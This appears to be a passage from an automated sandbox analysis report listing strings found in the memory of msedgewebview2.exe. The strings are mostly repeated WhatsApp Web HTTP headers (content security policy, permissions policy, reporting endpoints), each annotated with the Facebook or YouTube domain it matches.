{"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sat, 08 Mar 2025 21:07:23 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.
                  Source: msedgewebview2.exe, 00000020.00000003.2676119886.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: oqCVNwO8VFtcZWyXY0BOOr4Nkt0DjkeBGw==content-length:791date:Sun, 10 Mar 2024 16:46:27 GMTx-fb-connection-quality:MODERATE; q=0.3, rtt=227, rtx=0, c=1646, mss=1232, tbw=4611641, tp=3814, tpl=0, uplat=1, ullat=-1alt-svc:h3=":443"; ma=86400priority:u=1,i uplat=173, ullat=0alt-svc:h3=":443"; ma=86400priority:u=4,i 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sat, 08 Mar 2025 21:07:23 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.
                  Source: msedgewebview2.exe, 00000020.00000003.2570018424.00001B440044D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sat, 08 Mar 2025 23:07:07 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;origin-agent-cluster:?0x-fb-debug:moQfMemwpM/Uliw5Uco5hv5cZ0o4w/paCFEhjhvH+olfOOG5uPG1QW9iVig/TJ3MLqxbx7nERFAlCsPpzqnzvw==content-length:399date:Sun, 10 Mar 2024 16:46:27 GMTx-fb-connection-quality:MODERATE; q=0.3, rtt=227, rtx=0, c=1646, mss=1232, tbw=4611667, tp=3815, tpl=0, uplat=4, ullat=-1alt-svc:h3=":443"; ma=86400priority:u=3,i equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2570018424.00001B440044D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sat, 08 Mar 2025 23:07:07 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;origin-agent-cluster:?0x-fb-debug:moQfMemwpM/Uliw5Uco5hv5cZ0o4w/paCFEhjhvH+olfOOG5uPG1QW9iVig/TJ3MLqxbx7nERFAlCsPpzqnzvw==content-length:399date:Sun, 10 Mar 2024 16:46:27 GMTx-fb-connection-quality:MODERATE; q=0.3, rtt=227, rtx=0, c=1646, mss=1232, tbw=4611667, tp=3815, tpl=0, uplat=4, ullat=-1alt-svc:h3=":443"; ma=86400priority:u=3,i equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2676119886.00001B4400378000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393461202.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: permissions_policy="https://www.facebook.com/ajax/browser_error_reports/" equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2676119886.00001B4400378000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393461202.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"@ equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3651704953.00001B4400216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: permissions_policyhttps://www.facebook.com/ajax/browser_error_reports/["GAAAABQAAABodHRwczovL3doYXRzYXBwLmNvbQ==",false] equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3651704953.00001B4400216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: permissions_policyhttps://www.facebook.com/ajax/browser_error_reports/["GAAAABQAAABodHRwczovL3doYXRzYXBwLmNvbQ==",false]t!D equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2916083566.00001B4400478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: pp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2916083566.00001B4400478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: pp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2916083566.00001B4400478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: pp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;origin-agent-cluster:?0strict-transport-security:max-age=31536000; preload; includeSubDomainsx-fb-debug:moQfMemwpM/Uliw5Uco5hv5cZ0o4w/paCFEhjhvH+olfOOG5uPG1QW9iVig/TJ3MLqxbx7nERFAlCsPpzqnzvw==content-length:399date:Sun, 10 Mar 2024 16:46:27 GMTx-fb-connection-quality:MODERATE; q=0.3, rtt=227, rtx=0, c=1646, mss=1232, tbw=4611667, tp=3815, tpl=0, uplat=4, ullat=-1alt-svc:h3=":443"; ma=86400priority:u=3,i.W equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2916083566.00001B4400478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: pp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;origin-agent-cluster:?0strict-transport-security:max-age=31536000; preload; includeSubDomainsx-fb-debug:moQfMemwpM/Uliw5Uco5hv5cZ0o4w/paCFEhjhvH+olfOOG5uPG1QW9iVig/TJ3MLqxbx7nERFAlCsPpzqnzvw==content-length:399date:Sun, 10 Mar 2024 16:46:27 GMTx-fb-connection-quality:MODERATE; q=0.3, rtt=227, rtx=0, c=1646, mss=1232, tbw=4611667, tp=3815, tpl=0, uplat=4, ullat=-1alt-svc:h3=":443"; ma=86400priority:u=3,i.W equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2912815541.00001B44005E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: re-requests;src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2912815541.00001B44005E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: re-requests;src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2391697389.00001B4400434000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2392322891.00001B4400478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"} equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000026.00000003.2376075947.00004B18009EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"} equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2621450426.00001B440044D000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3651704953.00001B4400216000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3644902662.00001B44000D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: report-to:{"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"} equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2565835791.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"} equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000026.00000003.2426739799.00004B1800AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"} equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000026.00000003.2376075947.00004B18009EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/" equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2391697389.00001B4400434000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2392322891.00001B4400478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: reporting-endpoints: permissions_policy="https://www.facebook.com/ajax/browser_error_reports/" equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2565835791.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: reporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/" equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000026.00000003.2426739799.00004B1800AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: reporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/" equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2621450426.00001B440044D000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3651704953.00001B4400216000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3644902662.00001B44000D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: reporting-endpoints:permissions_policy="https://www.facebook.com/ajax/browser_error_reports/" equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3647474243.00001B4400130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: s://*.fm: *.*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2389380861.00001B44005E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2389380861.00001B44005E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 0000001D.00000002.3707687086.00002DDC00E94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;- equals www.facebook.com (Facebook)
